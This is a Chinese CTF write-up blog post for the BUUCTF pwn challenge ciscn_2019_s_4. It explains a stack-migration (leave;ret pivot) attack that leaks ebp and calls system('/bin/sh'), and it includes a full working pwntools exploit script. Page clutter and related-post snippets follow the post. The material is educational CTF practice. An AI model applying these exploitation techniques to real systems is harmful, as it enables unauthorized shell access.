【Pwn】BUUCTF ciscn_2019_s_4 wp 栈迁移

已于 2022-05-21 00:14:29 修改
阅读量485 收藏 1
点赞数 1
分类专栏: 个人日记 文章标签: c语言 python 系统安全
于 2022-05-20 22:01:49 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lcw_linyx/article/details/124890278
版权

前言

因为做的时候心态崩了,此wp当个人日记来写了 = =

WP

查看保护:32位程序,开启了nx保护

请添加图片描述

查看hack函数:

请添加图片描述
这是echo flag,不是flag.txt,所以ret到这里不能得到flag
虽然没有用,但是帮我们引入了system函数,就不需要ret2libc了,我们再写入“/bin/sh”构造ROP链就行

查看vuln函数:

请添加图片描述
可进行两次输入,都是往&s[ebp-0x28]里面写内容,那么第二次写会把第一次写的内容覆盖,我们只能写入0x30字节不足以ret到system函数执行system(“/bin/sh”),不得不进行栈迁移

思路:

首先我们需要寻找一个固定的位置来作为我们的栈迁移位置,也就是执行我们写入的获取shell的代码位置,我们写入的&s在栈中而不是bss段,那么只能从寻找栈中s的地址作为栈迁移地址

如果写入0x30,那么Printf输出的是写入的前0x28个的数据,和0x4字节的ebp和0x4字节的ret

那么可以通过第一个输入点通过自己构造的payload来泄露ebp的值,虽然程序每次运行时的ebp会发生变化,但是它与s的相对位置不会变化

我们可以通过gdb动调找一下栈中s距离ebp的距离,用于表示&s的位置,即栈迁移的位置,方便第二次往ebp写入其相对地址。

在第二个输入点向s写入执行system(“/bin/sh”)的相关指令,利用两次leave_ret将栈迁移到s处,执行栈中s地址里的指令,获取shell

调试:“遇事不决,可问动调”

第一次写入“aaaa”
第二次写入“bbbb”
通过不断步入直到第二次输出(call printf)指令左右,查看栈内容:
此时“aaaa”已经被覆盖为“bbbb”
$ebp=0xffffd018

&s=0xffffcfe0
在这里插入图片描述

计算偏移:0x38

在这里插入图片描述

查看leave_ret指令的地址:

可以用vuln函数和其他函数自带的leave_ret的地址
也可用ROPgadget找到的地址:

在这里插入图片描述

解析payload2:

payload=p32(sys)+b'aaaa'+p32(stack_add+12)+bin_sh

sys是system函数,返回地址覆盖为‘aaaa’,参数地址为 s + 12,因为“/bin/sh”写到了第4个位置,一个位置4字节,sys的地址是sys=s+0*4
那么“/bin/sh”地址就是s+(4-1)*4

后面就没什么说的了

payload=payload.ljust(0x28,b'a')
payload+=p32(stack_add-4)+p32(leave_ret)

构造Exp:

from pwn import *
context(os='linux', arch='i386', log_level='debug')
io=process('./ciscn_s_4')
#io=remote('node4.buuoj.cn',28463)
elf = ELF('./ciscn_s_4')
#libc=("./libc.6.so")

sd=lambda x:io.send(x)
sl=lambda x:io.sendline(x)
ru=lambda x:io.recvuntil(x)
rl=lambda :io.recvline()
ra=lambda :io.recv()
rn=lambda x:io.recv(x)
sla=lambda x,y:io.sendlineafter(x,y)

sys=elf.plt['system']
leave_ret=0x080484b8
#leave_ret=0x080485FD #这个是vuln函数里的指令,一样可以成功
flag=0x0804854B #Virtual flag

ru("What's your name?")

payload=b'a'*0x27+b'b'#设置标志为“b”
sd(payload)

ru("b")#接收到“b”时停止

stack_add=u32(rn(4))-0x38 #再接收4个字符即ebp,解码后-0x38得到s的地址
print(hex(stack_add))
rl()
bin_sh=b"/bin/sh\x00"
#写入的bin/sh 距离s+0x12,实际上system调用的是参数 s + 12 地址的bin/sh
payload=p32(sys)+b'aaaa'+p32(stack_add+12)+bin_sh
payload=payload.ljust(0x28,b'a')
payload+=p32(stack_add-4)+p32(leave_ret)

#gdb.attach(io)
sd(payload)
#pause()
io.interactive()

注意:

发送时用io.send(),不要用io.sendline(),

用了sendline()我自闭了一个小时!一个小时!!!payload没问题,但就是不能get shell !!
因为io.sendline()会多发一个0xa也就是“\n”,我们在构造payload的时候就已经写入了0x30字节大小,多出来的这个0xa会导致程序输入出错,就不能执行正确的结果了= =

运行Exp:

在这里插入图片描述

得到flag:

在这里插入图片描述

1ce0range
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
迁移图解
qq_40410406的博客
11-11 1432
迁移 场景 1 如果程序的保护措施canary开启,会在prev ebp空间的下一个低地址存放一个随机值,当我们溢出时会将这个随机值覆盖,程序检测到这个随机值发生变化以后会自动退出(崩溃),此时就无法进行溢出攻击,所以需要另寻出路。 2 溢出长度不足以使用直接 ROP 3 溢出 payload 会出现空字符截断,且gadget地址含有空字符 4 在泄露地址信息后需要新的 ROP payload 5 如果开启了不可执行保护,就需要迁移到bss段或者data段或者其他位置执行我们的gadge
pwnciscn_2019_s_4
Nothing
03-06 758
main函数,存在八个字节溢出,迁移,第一次泄露ebp,得到上buf地址,迁移到buf即可。 from pwn import * io=remote('node3.buuoj.cn',28060) leave=0x8048562 sys_plt=0x8048400 pl1='a'*0x24+'bbbb' io.send(pl1) io.recvuntil('bbbb') ebp=u32(...
ciscn_2019_n_3
12-30
ciscn(全国大学生信息安全竞赛),2019的一道题目,涉及到fastbin堆漏洞的利用。由于调用了system函数,所以漏洞利用的难度不大,推荐初学者练习。题解链接:https://blog.csdn.net/A951860555/article/details/111991072
buuctf ciscn_2019_s_4 pwn wp
weixin_44740530的博客
04-21 338
buuctf ciscn_2019_s_4 pwn wp https://www.jianshu.com/p/fabc34bafe18
ciscn_2019_s_4-迁移
个人笔记
06-07 655
思路:由于无直接getshell的利用函数,溢出空间只有8字节(ebp+ret占用无法继续填充ROP了),所以需要迁移更大的空间来构造ROP。迁移位置:执行函数+0xdeadbeef(假ebp)+0xdeadbeef(假ret)+参数。此迁移到s[40]数组的位置,先通过第一次打印泄露s[40]的起始地址。迁移核心(通过ROPGadget寻找。ebp位置:迁移位置-4(32位)ret位置:leave_ret。题目类型猜测:溢出,迁移。作用:赋值执行函数调用。
ciscn_2019_s_4
z1r0的博客
12-21 275
ciscn_2019_s_4 查看保护 有溢出啊,但是空间太小了,所以需要迁移一下。 迁移用leave ret这个gadget来让ebp, esp放到我们需要的地方 这里把迁移到s这里。所以得知道s的地址。这个时候需要借助printf打印来打印出地址。 有了ebp,s就-0x38。有system没有/bin/sh,所以将/bin/sh写进s里然后借助leave ret这个gadget让程序执行system(’/bin/sh’)即可。 from pwn import * context(ar
[BUUCTF-pwn]——ciscn_2019_s_4
Y_peak的博客
03-12 441
[BUUCTF-pwn]——ciscn_2019_s_4 题目地址:https://buuoj.cn/challenges#ciscn_2019_s_4 这道题是一道典型的劫持问题 前面有一道类似的,(挂了peak小知识), 如果需要可以去做一下 没有开启canary保护 在IDA中, 可以看出有明显的溢出, 不过溢出空间只够修改ebp和一个返回地址 但是, 仅仅一个返回地址是不够的, 并不能打印flag 思路 利用溢出,首先泄露出来main_ebp的地址 计算一下,我们输入的位置, 距离m
pwnciscn_2019_s_3
Nothing
12-14 4492
这题是全国大学生信息安全竞赛的一道线下半决赛题目,好像是华南赛区? 例行检查。 分析程序。 vul函数 两个系统调用,一个是sys_read,一个是sys_write,往上写数据(0x400),从上读数据(0x30),存在溢出。 还有一个gadget函数。 有两个值得注意的地方。mov rax,0fh 以及mov rax 59。这两个gadget控制了rax的值,看看这两个是什么系统调用...
ciscn-2019-pwn
11-29
1. baby_pwn2. bms3. daily4. Double5 your_pwn
your_pwn ciscn 2019 第十二届全国大学生信息安全竞赛
04-22
pwn赛题之your_pwn ciscn 2019 第十二届全国大学生信息安全竞赛
ciscn_2021_silverwolf.zip
05-18
2021第十四届全国大学生信息安全竞赛pwn题。
PWN.rar_AVR PWM_GPS FPGA_PWN_avr_avr pwn
09-23
AVR系列单片机Mage8PWM脉冲输出程序
ctfshow php特性上
weixin_63231007的博客
05-30 840
web93 $num = $_GET['num']; if($num==4476){ die("no no no!"); } if(preg_match("/[a-z]/i", $num)){ die("no no no!"); } if(intval($num,0)==4476){ echo $flag; }else{ echo intval($num,0); } 使用进制计算:
pwn环境搭建_【Vulnhub】bossplayersCTF与两道PWN
weixin_35930794的博客
12-21 161
扫不到 IP 可以参考之前的文章:Vulnhub分配IP问题 | w4sp-lab环境搭建改了之后就扫到了扫描一下端口nmap-p--A192.168.149.173查看网页源码,最下面有个 base64,解出来看看解了 3 次,解出来个workinginprogress.php访问一下,看着这个页面莫名其妙的感觉应该有命令执行...试了一下...这...kali 上面监听一下访问...
PWN-无libc泄露
zszcr的博客
03-22 3668
pwn题的无libc泄露用到的pwntools的DynELF模块实现条件是:有指向libc空间的 能泄露libc空间信息的函数 (write和puts函数)能重复触发漏洞DynELF模块的基本框架:p=process('./xxx')def leak(address):    payload='xxx'+address+'xxx'  #address就是你要泄露的地址 ,payload是你控制程序...
java网络编程——经典echo程序
Flag_died的博客
10-29 318
1.客户端 public class Client { private static final BufferedReader KEYBOARD_INPUT = new BufferedReader(new InputStreamReader(System.in)); public static String getString(String prompt) throws Exception...
Linux:echo命令详解
aji1978的博客
02-01 463
echo命令 用于字符串的输出 格式 echo string 使用echo实现更复杂的输出格式控制 1.显示普通字符串: echo "It is a test" 这里的双引号完全可以省略,以下命令与上面实例效果一致: echo It is a test 2.显示转义字符 echo "\"It is a...
hackme pwn echo [format string]
ACdream
01-31 420
题目名称就已经是很明显的提示了!echo ~ 提示:格式化字符串 从IDA中看main:即可看到printf(&s)! 漏洞原理部分: http://www.cnblogs.com/Ox9A82/p/5429099.html 漏洞刷题提升: https://www.anquanke.com/post/id/85785 https://www.anquanke.com/pos...
C语言 | Leetcode C语言题解之第132题分割回文串II
最新发布
m0_59237910的博客
06-05 562
C语言 | Leetcode C语言题解之第132题分割回文串II
buuctf [HarekazeCTF2019]baby_rop2
09-30
[BUUCTF-pwn]——[HarekazeCTF2019]baby_rop2是一个pwn题目。在这个题目中,主要的目标是获取read函数的地址,并利用该地址泄漏libc基址,然后计算system函数和/bin/sh字符串的地址,最终执行system('/bin/sh')获取...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值